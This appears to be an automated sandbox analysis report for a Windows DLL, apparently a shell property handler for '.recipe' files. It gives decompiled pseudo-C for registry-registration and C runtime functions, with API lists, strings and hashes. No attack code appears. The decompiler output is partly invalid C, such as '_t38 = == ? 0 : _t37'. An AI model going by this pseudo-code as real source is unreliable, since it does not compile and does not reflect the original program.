								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}

0x10003519
0x10003520
0x10003527
0x1000352b
0x10003535
0x10003538
0x1000354f
0x10003551
0x1000355b
0x10003568
0x10003568
0x00000000
0x1000355d
0x1000355d
0x10003562
0x00000000
0x10003564
0x10003564
0x1000356d
0x1000356f
0x1000356f
0x10003564
0x10003562
0x10003575
0x10003585
0x1000358d
0x10003593
0x10003597
0x100035a2
0x100035a2
0x100035a4
0x100035a6
0x100035b3
0x100035bd
0x100035c5
0x100035e5
0x100035eb
0x100035c7
0x100035c7
0x100035d7
0x00000000
0x00000000
0x100035d7
0x100035c5
0x100035b3
0x100035a4
0x10003604

APIs

vswprintf.LIBCMT ref: 10003551

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
StrCmpNICW.SHLWAPI(A957EF0B,Software\Classes\%s,00000013), ref: 100035BD
StrStrIW.SHLWAPI(A957EF0B,PropertyHandlers), ref: 100035D3
StrStrIW.SHLWAPI(A957EF0B,KindMap), ref: 100035DF

Strings

Recipe (.recipe) Property Handler, xrefs: 1000352A
PropertyHandlers, xrefs: 100035CD
Software\Classes\%s, xrefs: 100035B7
KindMap, xrefs: 100035D9

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Value__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
API String ID: 396321892-1357300599
Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0xa957ef0b
				_v8 = _t16 ^ _t40;
				_t35 = _a8;
				_v1036 = _a4;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}

0x10003319
0x10003320
0x10003328
0x1000332b
0x10003344
0x10003346
0x10003350
0x1000335d
0x1000335d
0x10003362
0x10003364
0x10003368
0x1000336a
0x1000336c
0x10003374
0x1000337a
0x1000337e
0x10003383
0x10003383
0x1000337e
0x10003389
0x1000338e
0x10003390
0x1000339d
0x100033a7
0x100033af
0x100033d7
0x100033d7
0x100033af
0x1000339d
0x100033e9
0x100033ed
0x100033fa
0x100033fa
0x10003352
0x10003357
0x00000000
0x00000000
0x10003359
0x00000000
0x1000335b
0x00000000
0x1000335b

APIs

vswprintf.LIBCMT ref: 10003346

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7

Strings

PropertyHandlers, xrefs: 100033B1
Software\Classes\%s, xrefs: 100033A1
KindMap, xrefs: 100033C1

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteTree__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1945471109-984809517
Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x1000cb56
0x1000cb5d
0x1000cb66
0x1000cb73
0x1000cbc5
0x1000cbc5
0x1000cb75
0x1000cb75
0x1000cb7d
0x1000cb8b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb93
0x1000cb93
0x1000cb95
0x1000cba7
0x00000000
0x1000cba9
0x1000cba9
0x1000cbb9
0x00000000
0x1000cbbb
0x1000cbc1
0x1000cbc1
0x1000cbb9
0x1000cba7
0x1000cb7d
0x1000cbc8
0x1000cbe0
0x1000cbe7
0x1000cbf5
0x1000cbe9
0x1000cbf0
0x1000cbf0
0x1000cbfa
0x1000cb5f
0x1000cb63
0x1000cb63

APIs

__ioinit.LIBCMT ref: 1000CB56

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

__get_osfhandle.LIBCMT ref: 1000CB6A
__get_osfhandle.LIBCMT ref: 1000CB95
__get_osfhandle.LIBCMT ref: 1000CB9E
__get_osfhandle.LIBCMT ref: 1000CBAA
CloseHandle.KERNEL32(00000000), ref: 1000CBB1
GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
__free_osfhnd.LIBCMT ref: 1000CBC8
__dosmaperr.LIBCMT ref: 1000CBEA

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150

Uniqueness

Uniqueness Score: -1.00%

Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
VariantClear.OLEAUT32(?), ref: 10002B69

Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A

PropVariantClear.OLE32(?), ref: 10002B59
VariantClear.OLEAUT32(?), ref: 10002B63

Strings

Recipe/ExtendedProperties/Property, xrefs: 10002A35
Key, xrefs: 10002ACA
EncodedValue, xrefs: 10002B09

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
API String ID: 3673094071-3396277477
Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}

0x100061ba
0x100061c6
0x100061d5
0x100061db
0x100061e0
0x100061e3
0x00000000
0x100061e5
0x100061f2
0x100061f6
0x100061f8
0x10006227
0x10006227
0x1000622c
0x1000622f
0x100061fa
0x10006208
0x1000620a
0x00000000
0x1000620c
0x1000620c
0x1000620e
0x1000620f
0x10006216
0x1000621c
0x10006220
0x10006224
0x10006226
0x10006226
0x1000620a
0x100061f8
0x100061c8
0x100061c8
0x100061c8
0x100061cf
0x100061cf

APIs

__init_pointers.LIBCMT ref: 100061BA

Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532

__mtinitlocks.LIBCMT ref: 100061BF

Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8

__mtterm.LIBCMT ref: 100061C8

Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F

__calloc_crt.LIBCMT ref: 100061ED
__initptd.LIBCMT ref: 1000620F
GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 757573777-0
Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150

Uniqueness

Uniqueness Score: -1.00%

Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}

0x1000c46d
0x1000c474
0x1000c47c
0x1000c481
0x1000c487
0x1000c48a
0x1000c48c
0x1000c48f
0x1000c49e
0x1000c4a1
0x1000c4bd
0x1000c4bf
0x1000c4c2
0x1000c4d7
0x1000c4dd
0x1000c4e0
0x1000c4e3
0x1000c4e6
0x1000c4eb
0x1000c4ed
0x1000c4f5
0x1000c4f7
0x1000c505
0x1000c506
0x1000c50c
0x1000c50e
0x00000000
0x00000000
0x1000c4f9
0x1000c4f9
0x1000c501
0x1000c503
0x1000c510
0x1000c511
0x00000000
0x00000000
0x00000000
0x1000c503
0x1000c4f7
0x1000c517
0x1000c51e
0x1000c5a0
0x1000c5a4
0x1000c5a9
0x1000c5aa
0x1000c5ab
0x1000c5b2
0x1000c5b7
0x1000c5bd
0x00000000
0x1000c520
0x1000c520
0x1000c528
0x1000c52d
0x1000c532
0x1000c535
0x1000c538
0x1000c53a
0x1000c553
0x1000c556
0x1000c573
0x1000c573
0x1000c558
0x1000c558
0x1000c55b
0x00000000
0x1000c55d
0x1000c56a
0x1000c56a
0x1000c55b
0x1000c578
0x1000c57c
0x00000000
0x1000c57e
0x1000c57e
0x1000c580
0x1000c581
0x1000c582
0x1000c583
0x1000c58d
0x1000c590
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c590
0x1000c53c
0x1000c53c
0x1000c53d
0x1000c53e
0x1000c547
0x1000c592
0x1000c595
0x1000c598
0x1000c5bf
0x1000c5bf
0x1000c5c2
0x1000c5cf
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x00000000
0x1000c5c4
0x1000c5c2
0x1000c53a
0x1000c4c4
0x1000c4c4
0x1000c4c7
0x1000c4ca
0x1000c54e
0x1000c5c8
0x1000c5c8
0x1000c4cc
0x1000c4cf
0x1000c4cf
0x1000c4d2
0x1000c4d4
0x00000000
0x1000c4d4
0x1000c4ca
0x1000c4a3
0x1000c4a8
0x00000000
0x1000c4a8
0x1000c491
0x1000c496
0x1000c4ae
0x1000c4ae
0x1000c4b2
0x1000c4b2
0x1000c5d6
0x1000c476
0x1000c47a
0x1000c47a

APIs

__ioinit.LIBCMT ref: 1000C46D

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10

Uniqueness

Uniqueness Score: -1.00%

Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x10005037
0x1000503e
0x10005046
0x1000504b
0x10005051
0x10005051
0x10005054
0x10005056
0x10005059
0x10005068
0x1000506b
0x10005085
0x10005087
0x1000508a
0x1000509f
0x1000509f
0x100050a5
0x100050a8
0x100050ab
0x100050ae
0x100050b3
0x100050b5
0x100050bd
0x100050bf
0x100050cd
0x100050ce
0x100050d4
0x100050d6
0x00000000
0x00000000
0x100050c1
0x100050c1
0x100050c9
0x100050cb
0x100050d8
0x100050d9
0x00000000
0x00000000
0x00000000
0x100050cb
0x100050bf
0x100050df
0x100050e6
0x10005164
0x10005165
0x10005166
0x1000516c
0x1000516d
0x1000516e
0x10005176
0x00000000
0x100050e8
0x100050e8
0x100050e8
0x100050ed
0x100050f0
0x100050f2
0x100050f5
0x100050f8
0x100050fb
0x100050fe
0x10005100
0x10005119
0x1000511c
0x10005139
0x10005139
0x1000511e
0x1000511e
0x10005121
0x00000000
0x10005123
0x10005130
0x10005130
0x10005121
0x1000513e
0x10005142
0x00000000
0x10005144
0x10005144
0x10005146
0x10005147
0x10005148
0x1000514e
0x10005153
0x10005156
0x00000000
0x00000000
0x00000000
0x00000000
0x10005156
0x10005102
0x10005102
0x10005103
0x10005104
0x1000510d
0x10005158
0x10005158
0x1000515b
0x1000515e
0x10005178
0x10005178
0x1000517b
0x10005186
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x00000000
0x1000517d
0x1000517b
0x10005100
0x1000508c
0x1000508c
0x1000508f
0x10005092
